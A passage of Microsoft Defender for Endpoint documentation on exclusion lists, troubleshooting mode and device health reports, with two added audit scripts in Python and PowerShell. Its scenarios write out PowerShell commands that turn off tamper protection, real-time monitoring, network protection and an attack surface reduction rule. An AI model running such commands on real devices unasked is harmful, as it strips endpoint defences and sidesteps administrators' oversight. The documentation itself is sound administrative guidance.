complete path to the file, such as C:\program files\contoso\Filename.exe .

Using a single exclusion list for multiple server workloads

Don't use a single exclusion list to define exclusions for multiple server workloads. Split
the exclusions for different application or service workloads into multiple exclusion lists.
For example, the exclusion list for your IIS Server workload must be different from the
exclusion list for your SQL Server workload.

Using incorrect environment variables as wildcards in the file name and folder path or
extension exclusion lists

Microsoft Defender Antivirus Service runs in system context using the LocalSystem
account, which means it gets information from the system environment variable, and
not from the user environment variable. Use of environment variables as a wildcard in
exclusion lists is limited to system variables and those applicable to processes running
as an NT AUTHORITY\SYSTEM account. Therefore, don't use user environment variables
as wildcards when adding Microsoft Defender Antivirus folder and process exclusions.
See the table under System environment variables for a complete list of system
environment variables.

See Use wildcards in the file name and folder path or extension exclusion lists for
information on how to use wildcards in exclusion lists.
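The following Python audit script is an added example (not Microsoft tooling) that applies the do-not-exclude lists, the fully-qualified-path rule, and the environment-variable rule from the sections above to a candidate exclusion list. The rule sets are abbreviated from the article's lists, which variables count as user-scoped is an assumption of the example, and the sample list is constructed.

```python
"""Audit a proposed Microsoft Defender Antivirus exclusion list against the
common mistakes described in this article. Added illustration, not Microsoft
tooling: the rule sets are abbreviated from the article's lists, which
environment variables count as user-scoped is this example's assumption, and
the sample exclusion list at the end is constructed."""
import re
from typing import List, Tuple

# Folder exclusions the article says not to define, normalized to lower case
# without a trailing backslash; <UserProfileName> entries are in PROFILE_TEMP.
RISKY_FOLDERS = {
    "%systemdrive%", "c:", r"c:\*",
    r"%programfiles%\java", r"c:\program files\java",
    r"%programfiles%\contoso", r"c:\program files\contoso",
    r"%programfiles(x86)%\contoso", r"c:\program files (x86)\contoso",
    r"c:\temp", r"c:\temp\*", r"c:\users", r"c:\users\*",
    r"%windir%\prefetch", r"c:\windows\prefetch", r"c:\windows\prefetch\*",
    r"%windir%\system32\spool", r"c:\windows\system32\spool",
    r"c:\windows\system32\catroot2",
    r"%windir%\temp", r"c:\windows\temp", r"c:\windows\temp\*",
}
PROFILE_TEMP = re.compile(r"c:\\users\\[^\\]+\\appdata\\(local|locallow)\\temp")
# The article's explicit SharePoint exception to the profile Temp rule.
SHAREPOINT_OK = {r"c:\users\serviceaccount\appdata\local\temp",
                 r"c:\users\default\appdata\local\temp"}
# Image formats (.gif, .jpg, .jpeg, .png) are left out because the article
# permits excluding them where software is modern and kept up to date.
RISKY_EXTENSIONS = {
    ".7z", ".bat", ".bin", ".cab", ".cmd", ".com", ".cpl", ".dll", ".exe", ".fla",
    ".gz", ".hta", ".inf", ".java", ".jar", ".job", ".js", ".ko", ".ko.gz", ".msi",
    ".ocx", ".ps1", ".py", ".rar", ".reg", ".scr", ".sys", ".tar", ".tmp", ".url",
    ".vbe", ".vbs", ".wsf", ".zip",
}
RISKY_PROCESSES = {
    "bash.exe", "bitsadmin.exe", "cmd.exe", "cscript.exe", "dotnet.exe",
    "excel.exe", "java.exe", "msbuild.exe", "mshta.exe", "outlook.exe",
    "powerpnt.exe", "powershell.exe", "psexec.exe", "schtasks.exe",
    "svchost.exe", "winword.exe", "wmic.exe", "wscript.exe", "wuauclt.exe",
}
# Per-user variables that the service, running as LocalSystem, does not see.
# Which variables are user-scoped is an assumption of this example.
USER_VARIABLES = {"%userprofile%", "%appdata%", "%localappdata%"}
# Entries that start with a drive letter, a variable or a UNC prefix count as
# fully qualified; anything else is a bare name.
QUALIFIED = re.compile(r"[a-z]:|%|\\\\")

def _norm(entry: str) -> str:
    return entry.strip().lower().rstrip("\\")

def audit_path(entry: str) -> List[str]:
    """Problems with one file or folder path exclusion."""
    e, problems = _norm(entry), []
    if e in SHAREPOINT_OK:
        return problems
    if e in RISKY_FOLDERS or PROFILE_TEMP.fullmatch(e):
        problems.append("folder is on the do-not-exclude list")
    if not QUALIFIED.match(e):
        problems.append("bare file name; use the fully qualified path")
    for var in re.findall(r"%[^%]+%", e):
        if var in USER_VARIABLES:
            problems.append(f"user variable {var} is not expanded by the service")
    return problems

def audit_extension(entry: str) -> List[str]:
    ext = "." + _norm(entry).lstrip("*.")
    return ["extension is on the do-not-exclude list"] if ext in RISKY_EXTENSIONS else []

def audit_process(entry: str) -> List[str]:
    """Problems with one process exclusion (same bare-name rule as for files)."""
    e, problems = _norm(entry), []
    if e.rsplit("\\", 1)[-1] in RISKY_PROCESSES:
        problems.append("process is on the do-not-exclude list")
    if not QUALIFIED.match(e):
        problems.append("bare process name; use the fully qualified image path")
    return problems

def audit(exclusions: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Run the checks over (kind, entry) pairs; kind is path, extension or process."""
    checks = {"path": audit_path, "extension": audit_extension, "process": audit_process}
    return [(entry, problem) for kind, entry in exclusions
            for problem in checks[kind](entry)]

# Constructed sample list, mixing acceptable and problematic entries.
SAMPLE = [
    ("path", r"C:\Temp"),
    ("path", r"C:\Users\alice\AppData\Local\Temp"),
    ("path", r"C:\Users\ServiceAccount\AppData\Local\Temp"),
    ("path", r"%USERPROFILE%\Contoso\cache"),
    ("path", "Filename.exe"),
    ("path", r"C:\Program Files\Contoso\Filename.exe"),
    ("extension", ".ps1"),
    ("extension", "jpg"),
    ("process", "cmd.exe"),
    ("process", r"C:\Program Files\Contoso\agent.exe"),
]
```

Running `audit(SAMPLE)` returns one (entry, problem) pair per issue found, so an empty result means the list passed every check in this script.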

See also
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Configure custom exclusions for Microsoft Defender Antivirus
Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
Configure and validate exclusions for Microsoft Defender for Endpoint on macOS


Get started with troubleshooting mode
in Microsoft Defender for Endpoint
Article • 09/25/2023

Applies to:

Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Troubleshooting mode in Microsoft Defender for Endpoint enables admins to
troubleshoot various Microsoft Defender Antivirus features, even if devices are managed
by organizational policies. For example, if tamper protection is enabled, certain settings
can't be modified or turned off, but you can use troubleshooting mode on a device to
edit those settings temporarily.

Troubleshooting mode is disabled by default, and requires you to turn it on for a device
(and/or group of devices) for a limited time. Troubleshooting mode is exclusively an
enterprise-only feature, and requires Microsoft Defender portal access.

Tip

During troubleshooting mode, you can use the PowerShell command
Set-MPPreference -DisableTamperProtection $true on Windows devices.

To check the state of tamper protection, you can use the Get-MpComputerStatus
PowerShell cmdlet. In the list of results, look for IsTamperProtected or
RealTimeProtectionEnabled. (A value of true means tamper protection is enabled.)

What do you need to know before you begin?

During troubleshooting mode, you can use the PowerShell command Set-MPPreference
-DisableTamperProtection $true or, on client operating systems, the Security Center app
to temporarily disable tamper protection on your device and make your necessary
configuration changes.

Use troubleshooting mode to disable/change the tamper protection setting to
perform:
  Microsoft Defender Antivirus functional troubleshooting / application
  compatibility (false positive application blocks).

Local admins, with appropriate permissions, can change configurations on
individual endpoints that are usually locked by policy. Having a device in
troubleshooting mode can be helpful when diagnosing Microsoft Defender
Antivirus performance and compatibility scenarios.

Local admins can't turn off Microsoft Defender Antivirus, or uninstall it.

Local admins can configure all other security settings in the Microsoft Defender
Antivirus suite (for example, cloud protection, tamper protection).

Admins with "Manage Security settings" permissions have access to turn on
troubleshooting mode.

Microsoft Defender for Endpoint collects logs and investigation data throughout
the troubleshooting process:
  A snapshot of MpPreference is taken before troubleshooting mode begins.
  A second snapshot is taken just before troubleshooting mode expires.
  Operational logs from during troubleshooting mode are also collected.

Logs and snapshots are collected and are available for an admin to collect using
the Collect investigation package feature on the device page. Microsoft doesn't
remove this data from the device until an admin has collected it.

Admins can also review the changes in settings that take place during
troubleshooting mode in Event Viewer on the device page.

Troubleshooting mode automatically turns off after reaching the expiration time (it
lasts for 4 hours). After expiration, all policy-managed configurations become
read-only again and revert back to how the device was configured before enabling
troubleshooting mode.

It could take up to 15 minutes from the time the command is sent from Microsoft
Defender XDR to when it becomes active on the device.

Notifications are sent to the user when troubleshooting mode begins and when
troubleshooting mode ends. A warning is also sent to indicate that
troubleshooting mode is ending soon.

The beginning and ending of troubleshooting mode is identified in the Device
Timeline on the device page.

You can query all troubleshooting mode events in advanced hunting.

Note

Policy management changes are applied to the device when it is actively in
troubleshooting mode. However, the changes do not take effect until
troubleshooting mode expires. Additionally, Microsoft Defender Antivirus platform
updates are not applied during troubleshooting mode. Platform updates are
applied when troubleshooting mode ends with a Windows update.

Prerequisites
A device running Windows 10 (version 19044.1618 or later), Windows 11, Windows
Server 2019, or Windows Server 2022.

Semester/Redstone | OS version | Release
21H2/SV1 | >=22000.593 | KB5011563: Microsoft Update Catalog
20H1/20H2/21H1 | >=19042.1620, >=19041.1620, >=19043.1620 | KB5011543: Microsoft Update Catalog
Windows Server 2022 | >=20348.617 | KB5011558: Microsoft Update Catalog
Windows Server 2019 (RS5) | >=17763.2746 | KB5011551: Microsoft Update Catalog

Troubleshooting mode is also available for machines running the modern, unified
solution for Windows Server 2012 R2 and Windows Server 2016. Before you use
troubleshooting mode, make sure all of the following components are up to date:

Sense version 10.8049.22439.1084 or later (KB5005292: Microsoft Update Catalog)
Microsoft Defender Antivirus - Platform: 4.18.2207.7 or later (KB4052623: Microsoft Update Catalog)
Microsoft Defender Antivirus - Engine: 1.1.19500.2 or later (KB2267602: Microsoft Update Catalog)

For troubleshooting mode to be applied, Microsoft Defender for Endpoint must be
tenant-enrolled and active on the device.

The device must be actively running Microsoft Defender Antivirus, version
4.18.2203 or later.

Enable troubleshooting mode

1. Go to the Microsoft Defender portal (https://security.microsoft.com ), and sign in.

2. Navigate to the device page/machine page for the device on which you want to turn
on troubleshooting mode. Select Turn on troubleshooting mode. You must have
"Manage security settings in Security Center" permissions for Microsoft Defender
for Endpoint.

7 Note

The Turn on troubleshooting mode option is available on all devices, even if the
device does not meet the prerequisites for troubleshooting mode.

3. Confirm you want to turn on troubleshooting mode for the device.


4. The device page shows the device is now in troubleshooting mode.

Advanced hunting queries


Here are some prebuilt advanced hunting queries to give you visibility into the
troubleshooting events that are occurring in your environment. You can also use these
queries to create detection rules to generate alerts when devices are in troubleshooting
mode.

Get troubleshooting events for a particular device


Search by deviceId or deviceName by commenting out the respective lines.

Kusto

//let deviceName = "<deviceName>"; // update with device name
let deviceId = "<deviceID>"; // update with device id
DeviceEvents
| where DeviceId == deviceId
//| where DeviceName == deviceName
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| project Timestamp, DeviceId, DeviceName, _tsmodeproperties,
    _tsmodeproperties.TroubleshootingState,
    _tsmodeproperties.TroubleshootingPreviousState,
    _tsmodeproperties.TroubleshootingStartTime,
    _tsmodeproperties.TroubleshootingStateExpiry,
    _tsmodeproperties.TroubleshootingStateRemainingMinutes,
    _tsmodeproperties.TroubleshootingStateChangeReason,
    _tsmodeproperties.TroubleshootingStateChangeSource

Devices currently in troubleshooting mode

Kusto

DeviceEvents
| where Timestamp > ago(3h) // troubleshooting mode automatically disables after 4 hours
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
| order by Timestamp desc

Count of troubleshooting mode instances by device

Kusto

DeviceEvents
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| where Timestamp > ago(30d) // choose the date range you want
| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
| sort by count_

Total count

Kusto

DeviceEvents
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| where Timestamp > ago(2d) // beginning of time range
| where Timestamp < ago(1d) // end of time range
| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count()
| where count_ > 5 // choose your max # of TS mode instances for your time range

Related articles

 Tip

Performance tip Due to a variety of factors, Microsoft Defender Antivirus, like other
antivirus software, can cause performance issues on endpoint devices. In some
cases, you might need to tune the performance of Microsoft Defender Antivirus to
alleviate those performance issues. Microsoft's Performance analyzer is a
PowerShell command-line tool that helps determine which files, file paths,
processes, and file extensions might be causing performance issues; some
examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations – for example:
  top files per extension
  top paths per extension
  top processes per path
  top scans per file
  top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See: Performance analyzer for
Microsoft Defender Antivirus.

Troubleshooting mode scenarios


Protect security settings with tamper protection
 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .

Troubleshooting mode scenarios in
Microsoft Defender for Endpoint
Article • 10/26/2023

Applies to:

Microsoft Defender for Endpoint


Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint troubleshooting mode allows you to troubleshoot
various Microsoft Defender Antivirus features by enabling them from the device and
testing different scenarios, even if they're controlled by the organization policy.
Troubleshooting mode is disabled by default and requires you to turn it on for a device
(and/or group of devices) for a limited time. This is an enterprise-only feature, and
requires Microsoft Defender XDR access.

For troubleshooting performance-specific issues related to Microsoft Defender Antivirus,
see: Performance analyzer for Microsoft Defender Antivirus.

 Tip

During troubleshooting mode, you can use the PowerShell command
Set-MpPreference -DisableTamperProtection $true on Windows devices.

To check the state of tamper protection, you can use the Get-MpComputerStatus
PowerShell cmdlet. In the list of results, look for IsTamperProtected or
RealTimeProtectionEnabled. (A value of true means tamper protection is enabled.)

Scenario 1: Unable to install application


If you want to install an application but receive an error message that Microsoft
Defender Antivirus and tamper protection is on, use the following procedure to
troubleshoot the issue.
1. Request the security admin to turn on troubleshooting mode. You get a Windows
Security notification once the troubleshooting mode starts.

2. Connect to the device (using Terminal Services for example) with local admin
permissions.

3. Start Process Monitor (ProcMon). See the steps described in Troubleshoot
performance issues related to real-time protection.

4. Go to Windows security > Threat & virus protection > Manage settings >
Tamper protection > Off.

Alternately, during troubleshooting mode, you can use the PowerShell command
Set-MpPreference -DisableTamperProtection $true on Windows devices.

To check the state of tamper protection, you can use the Get-MpComputerStatus
PowerShell cmdlet. In the list of results, look for IsTamperProtected or
RealTimeProtectionEnabled. (A value of true means tamper protection is enabled.)

5. Launch an elevated PowerShell command prompt, and toggle off real-time
protection.

Run Get-MpComputerStatus to check the status of real-time protection.
Run Set-MpPreference -DisableRealtimeMonitoring $true to turn off real-time protection.
Run Get-MpComputerStatus again to verify status.

6. Try installing the application.

Scenario 2: High CPU usage due to Windows Defender (MsMpEng.exe)

Sometimes during a scheduled scan, MsMpEng.exe can consume high CPU.

1. Go to Task Manager > Details tab to confirm that MsMpEng.exe is the reason
behind the high CPU usage. Also check to see if a scheduled scan is currently
underway.

2. Run Process Monitor (ProcMon) during the CPU spike for around five minutes, and
then review the ProcMon log for clues.

3. When the root cause is determined, turn on troubleshooting mode.

4. Sign into the device, and launch an elevated PowerShell command prompt.
5. Add process/file/folder/extension exclusions based on ProcMon findings using one
of the following commands (the path, extension, and process exclusions
mentioned in this article are examples only):

Set-MpPreference -ExclusionPath C:\DB\DataFiles
Set-MpPreference -ExclusionExtension .dbx
Set-MpPreference -ExclusionProcess C:\DB\Bin\Convertdb.exe

6. After adding the exclusion, check to see if the CPU usage has dropped.

For more information on Set-MpPreference cmdlet configuration preferences for
Microsoft Defender Antivirus scans and updates, see Set-MpPreference.

Scenario 3: Application taking longer to perform an action

When Microsoft Defender Antivirus real-time protection is turned on, applications can
take longer to perform basic tasks. To turn off real-time protection and troubleshoot the
issue, use the following procedure.

1. Request security admin to turn on troubleshooting mode on the device.

2. To disable real-time protection for this scenario, first turn off tamper protection.
You can use the PowerShell command Set-MpPreference -DisableTamperProtection $true
on Windows devices.

To check the state of tamper protection, you can use the Get-MpComputerStatus
PowerShell cmdlet. In the list of results, look for IsTamperProtected or
RealTimeProtectionEnabled. (A value of true means tamper protection is enabled.)

For more information, see Protect security settings with tamper protection.

3. Once tamper protection is disabled, sign into the device.

4. Launch an elevated PowerShell command prompt, and run the following command:

Set-MpPreference -DisableRealtimeMonitoring $true

5. After disabling real-time protection, check to see if the application is slow.


Scenario 4: Microsoft Office plugin blocked by Attack Surface Reduction

Attack surface reduction isn't allowing a Microsoft Office plugin to work properly because
the rule Block all Office applications from creating child processes is set to block mode.

1. Turn on troubleshooting mode, and sign into the device.

2. Launch an elevated PowerShell command prompt, and run the following command:

Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Disabled

3. After disabling the ASR Rule, confirm that the Microsoft Office plugin now works.

For more information, see Overview of attack surface reduction.

Scenario 5: Domain blocked by Network Protection

Network Protection is blocking a Microsoft domain, preventing users from accessing it.

1. Turn on troubleshooting mode, and sign into the device.

2. Launch an elevated PowerShell command prompt, and run the following command:

Set-MpPreference -EnableNetworkProtection Disabled

3. After disabling Network Protection, check to see if the domain is now allowed.

For more information, see Use network protection to help prevent connections to bad
sites.
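Scenarios 1 through 5 all follow the same pattern: turn on troubleshooting mode, loosen one setting with Set-MpPreference, test, and rely on the device reverting when the mode expires. The following PowerShell is an added example, not part of the Microsoft article, that records exactly the settings those scenarios touch before the session and diffs them against the live device afterwards, so a local admin can confirm nothing (an exclusion, real-time protection, the ASR rule, network protection) was left loosened; the snapshot file path and the function names are assumptions.

```powershell
# Added example (not from the Microsoft article): snapshot the Defender settings that
# Scenarios 1-5 change, then diff against that snapshot once troubleshooting mode has
# expired. Requires an elevated prompt and the built-in Defender module
# (Get-MpPreference, Get-MpComputerStatus). The snapshot path below is an assumption.
$SnapshotPath = Join-Path $env:ProgramData 'TsModeBaseline.xml'   # assumed location

# ASR rule GUID used in Scenario 4 (Block all Office applications from creating child processes)
$OfficeChildProcRule = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'

function Get-TsModeSettings {
    # Collect only the preference and status values the five scenarios touch.
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # Action configured for the Scenario 4 rule (0 = Disabled, 1 = Block, 2 = Audit).
    $ruleAction = 'NotConfigured'
    $ids = @($pref.AttackSurfaceReductionRules_Ids)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        if ($ids[$i] -ieq $OfficeChildProcRule) {
            $ruleAction = $pref.AttackSurfaceReductionRules_Actions[$i]
        }
    }

    [pscustomobject]@{
        Captured                  = Get-Date
        IsTamperProtected         = $status.IsTamperProtected          # Scenarios 1 and 3
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled  # Scenarios 1 and 3
        DisableRealtimeMonitoring = $pref.DisableRealtimeMonitoring    # Scenarios 1 and 3
        EnableNetworkProtection   = $pref.EnableNetworkProtection      # Scenario 5 (0 = Disabled)
        OfficeChildProcRuleAction = $ruleAction                        # Scenario 4
        # Exclusion lists are sorted and joined so order changes do not show up as drift.
        ExclusionPath             = @($pref.ExclusionPath      | Sort-Object) -join ';'  # Scenario 2
        ExclusionExtension        = @($pref.ExclusionExtension | Sort-Object) -join ';'  # Scenario 2
        ExclusionProcess          = @($pref.ExclusionProcess   | Sort-Object) -join ';'  # Scenario 2
    }
}

function Save-TsModeBaseline {
    # Run before the security admin turns on troubleshooting mode: the local
    # counterpart of the MpPreference snapshot Defender for Endpoint takes itself.
    Get-TsModeSettings | Export-Clixml -Path $SnapshotPath
    Write-Host "Baseline saved to $SnapshotPath"
}

function Compare-TsModeBaseline {
    # Run after the 4-hour window: emit one row per tracked setting that still differs
    # from the baseline (for example an exclusion left behind or real-time protection off).
    $before = Import-Clixml -Path $SnapshotPath
    $after  = Get-TsModeSettings
    foreach ($name in $after.PSObject.Properties.Name) {
        if ($name -eq 'Captured') { continue }
        if ("$($before.$name)" -ne "$($after.$name)") {
            [pscustomobject]@{ Setting = $name; Baseline = $before.$name; Now = $after.$name }
        }
    }
}

# Typical session (elevated prompt):
#   Save-TsModeBaseline                                  # before troubleshooting mode is turned on
#   Set-MpPreference -DisableRealtimeMonitoring $true    # a Scenario 1/3 step, while in troubleshooting mode
#   Compare-TsModeBaseline | Format-Table                # after expiry; no rows means the device is back to baseline
```

Any row that Compare-TsModeBaseline still emits after expiry is a setting that did not revert on its own and deserves the same Advanced hunting follow-up the earlier article describes.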

See also
Enable troubleshooting mode
Protect security settings with tamper protection
Set-MpPreference
Get an overview of Microsoft Defender for Endpoint


Device health reports in Microsoft
Defender for Endpoint
Article • 11/15/2023

Applies to:

Microsoft Defender XDR


Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The Device Health report provides information about the devices in your organization.
The report includes trending information showing the sensor health state, antivirus
status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update
versions.

) Important

For Windows Server 2012 R2 and Windows Server 2016 to appear in device health
reports, these devices must be onboarded using the modern unified solution
package. For more information, see New functionality in the modern unified
solution for Windows Server 2012 R2 and 2016.

In the Microsoft 365 Security dashboard navigation panel, select Reports, and then
open Device health and compliance. The Device health and compliance dashboard is
structured in two tabs:

The Sensor health & OS tab provides general operating system information,
divided into three cards that display the following device attributes:
Sensor health card
Operating systems and platforms card
Windows versions card

The Microsoft Defender Antivirus health tab has eight cards that report on
aspects of Microsoft Defender Antivirus:
Antivirus mode card
Antivirus engine version card
Antivirus security intelligence version card
Antivirus platform version card
Recent antivirus scan results card
Antivirus engine updates card
Security intelligence updates card
Antivirus platform updates card

Report access permissions


To access the Device health and antivirus compliance report in the Microsoft 365
Security dashboard, the following permissions are required:

Permission name | Permission type
View Data | Threat and vulnerability management (TVM)

To assign these permissions:

1. Sign in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.
2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).
3. Select the role you'd like to edit.
4. Select Edit.
5. In Edit role, on the General tab, in Role name, type a name for the role.
6. In Description type a brief summary of the role.
7. In Permissions, select View Data, and under View Data select Threat and
vulnerability management (TVM).

See also

Create and manage roles for role-based access control.


Export device antivirus health details API methods and properties


Device health, Microsoft Defender
Antivirus health report
Article • 02/18/2024

Applies to:

Microsoft Defender XDR


Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The Device Health report provides information about the devices in your organization.
The report includes trending information showing the antivirus status and Microsoft
Defender Antivirus engine, intelligence, and platform versions.

) Important

For devices to appear in Microsoft Defender Antivirus device health reports, they
must meet the following prerequisites:

Device is onboarded to Microsoft Defender for Endpoint
OS: Windows 10, Windows 11, Windows Server 2012 R2, 2016, 2019, 2022 (non-MMA), macOS, Linux
Sense (MsSense.exe): 10.8210.*+. See the Prerequisites section for related details.

For Windows Server 2012 R2 and Windows Server 2016 to appear in device health
reports, these devices must be onboarded using the modern unified solution
package. For more information, see New functionality in the modern unified
solution for Windows Server 2012 R2 and 2016.

In the Microsoft 365 Security dashboard navigation panel, select Reports, and then
open Device health and compliance. The Microsoft Defender Antivirus health tab has
eight cards that report on the following aspects of Microsoft Defender Antivirus:

Antivirus mode card
Antivirus engine version card
Antivirus security intelligence version card
Antivirus platform version card
Recent antivirus scan results card
Antivirus engine updates card
Security intelligence updates card
Antivirus platform updates card

Report access permissions


To access the Device health and antivirus compliance report in the Microsoft 365
Security dashboard, the following permissions are required:

Permission name | Permission type
View Data | Threat and vulnerability management (TVM)

To assign these permissions:

1. Sign in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.
2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).
3. Select the role you'd like to edit.
4. Select Edit.
5. In Edit role, on the General tab, in Role name, type a name for the role.
6. In Description type a brief summary of the role.
7. In Permissions, select View Data, and under View Data select Threat and
vulnerability management (TVM).

For more information about user role management, see Create and manage roles for
role-based access control.

Microsoft Defender Antivirus health tab


The Microsoft Defender Antivirus health tab contains eight cards that report on several
aspects of Microsoft Defender Antivirus in your organization:

Two cards, Antivirus mode card and Recent antivirus scan results card, report about
Microsoft Defender Antivirus functions.

The remaining six cards report about the Microsoft Defender Antivirus status for devices
in your organization:
version cards | update cards{1}
Antivirus engine version card | Antivirus engine updates card
Antivirus security intelligence version card | Security intelligence updates card
Antivirus platform version card | Antivirus platform updates card
The three version cards provide flyout reports that provide additional information, and enable further exploration. | The three up-to-date reporting cards provide links to resources to learn more.

{1}
For the three updates cards (also known as up-to-date reporting cards), "No data
available" (or "Unknown" value) indicates devices that aren't reporting update status.
Devices that aren't reporting update status can be due to various reasons, such as:

Computer is disconnected from the network.
Computer is powered down or in a hibernation state.
Microsoft Defender Antivirus is disabled.
Device is a non-Windows (Mac or Linux) device.
Cloud protection isn't enabled.
Device doesn't meet pre-requisites for Antivirus engine or platform version.

Prerequisites
Up-to-date reporting generates information for devices that meet the following criteria:

Engine version: 1.1.19300.2+

Platform version: 4.18.2202.1+

Cloud protection enabled

Sense (MsSense.exe): 10.8210. *+

Windows OS - Windows 10 1809 or later

7 Note

* Currently up to date reporting is only available for Windows devices. Cross
platform devices such as Mac and Linux are listed under "No data
available"/Unknown.

Card functionality
The functionality is essentially the same for all cards. By clicking on a numbered bar in
any of the cards, the Microsoft Defender Antivirus details flyout opens enabling you to
review information about all the devices configured with the version number of an
aspect on that card.

If the version number that you clicked on is:

A current version, then Remediation required and Security recommendation
aren't present.
An outdated version, a notification at the top of the report is present, indicating
Remediation required, and a Security recommendation link is present. Select the
security recommendation link to navigate to the threat and vulnerability
management console, which can recommend appropriate antivirus updates.
To add or remove specific types of information on the Microsoft Defender Antivirus
details flyout, select Customize Columns. In Customize Columns, select or clear items
to specify what you want included in the Microsoft Defender Antivirus details report.

New Microsoft Defender Antivirus filter definitions


The following table contains a list of terms that are new to Microsoft Defender Antivirus
reporting.

Column name | Description
Security intelligence publish time | Indicates Microsoft's release date of the security intelligence update version on the device. Devices with a security intelligence publish time greater than seven days are considered out of date in the reports.
Last seen | Indicates the date when the device last had a connection.
Data refresh timestamp | Indicates when client events were last received for reporting on: AV mode, AV engine version, AV platform version, AV security intelligence version, and scan information.
Signature refresh time | Indicates when client events were last received for reporting on engine, platform, and signature up to date status.

Within the flyout: clicking on the name of the device will redirect you to the "Device
page" for that device, where you can access detailed reports.
Export report
There are two levels of reports that you can export, through two different export CSV
functions in the portal:

Top level export. You can use the top-level Export button to gather an all-up
Microsoft Defender Antivirus health report (500-K limit).

Flyout level export. You can use the Export button within the flyouts to export a
report to an Excel spreadsheet (100-K limit).

Exported reports capture information based on your entry point into the details report
and which filters or customized columns you have set.

For information on exporting using API, see the following articles:

Export device antivirus health report
Export device antivirus health details API methods and properties

) Important

Currently, only the Antivirus Health JSON Response is generally available. Antivirus
Health API via files is only available in public preview.
Advanced Hunting custom query is currently only available in public preview, even
if the queries are visible.

Microsoft Defender Antivirus version and update cards functionality
Following are descriptions for the six cards that report about the version and update
information for Microsoft Defender Antivirus engine, security intelligence, and platform
components:

Full report
In any of the three version cards, select View full report to display the nine most recent
Microsoft Defender Antivirus version reports for each of the three device types:
Windows, Mac, and Linux; if fewer than nine exist, they're all shown. An Other category
captures recent antivirus engine versions ranking tenth and below, if detected.

A primary benefit of the three version cards is that they provide quick indicators as to
whether the most current versions of the antivirus engines, platforms, and security
intelligence are being utilized. Coupled with the detailed information that is linked to
the card, the versions cards become a powerful tool to check if versions are up to date
and to gather information about individual computers, or groups of computers. Ideally,
when you run these reports, they'll indicate that the most current antivirus versions are
installed, as opposed to older versions. Use these reports to determine whether your
organization is taking full advantage of the most current versions.

To help ensure your anti-malware solution detects the latest threats, get updates
automatically as part of Windows Update.

For more details on the current versions and how to update the different Microsoft
Defender Antivirus components, visit Microsoft Defender Antivirus platform support.

Card descriptions
Following are brief summaries of the collected information reported in each of the
Antivirus version cards:

Antivirus mode card

Reports on how many devices in your organization – on the date indicated on the card –
are in any of the following Microsoft Defender Antivirus modes:

value | mode
0 | Active
1 | Passive
2 | Disabled (uninstalled, disabled, or SideBySidePassive {also known as Low Periodic Scan})
3 | Others (Not running, Unknown)
4 | EDRBlocked

Following are descriptions for each mode:

Active mode - In active mode, Microsoft Defender Antivirus is used as the primary
antivirus app on the device. Files are scanned, threats are remediated, and
detected threats are listed in your organization's security reports and in your
Windows Security app.
Passive mode - In passive mode, Microsoft Defender Antivirus isn't used as the
primary antivirus app on the device. Files are scanned, and detected threats are
reported, but threats aren't remediated by Microsoft Defender Antivirus.
IMPORTANT: Microsoft Defender Antivirus can run in passive mode only on
endpoints that are onboarded to Microsoft Defender for Endpoint. See
Requirements for Microsoft Defender Antivirus to run in passive mode.
Disabled mode - synonymous with: uninstalled, disabled, sideBySidePassive, and
Low Periodic Scan. When disabled, Microsoft Defender Antivirus isn't used. Files
aren't scanned, and threats aren't remediated. In general, Microsoft doesn't
recommend disabling or uninstalling Microsoft Defender Antivirus.
Others mode - Not running, Unknown
EDR in Block mode - In endpoint detection and response (EDR) blocked mode. See
Endpoint detection and response in block mode

Devices that are in either passive, LPS, or Off present a potential security risk and should
be investigated.

For details about LPS, see Use limited periodic scanning in Microsoft Defender Antivirus.

Recent antivirus scan results card

This card has two bar graphs showing all-up results for quick scans and full scans. In
both graphs, the first bar indicates the completion rate for scans (Completed, Canceled,
or Failed). The second bar in each section provides the error codes for failed scans. By
scanning the Mode and Recent scan results columns, you can quickly identify devices
that aren't in active antivirus scan mode, and devices that have failed or canceled
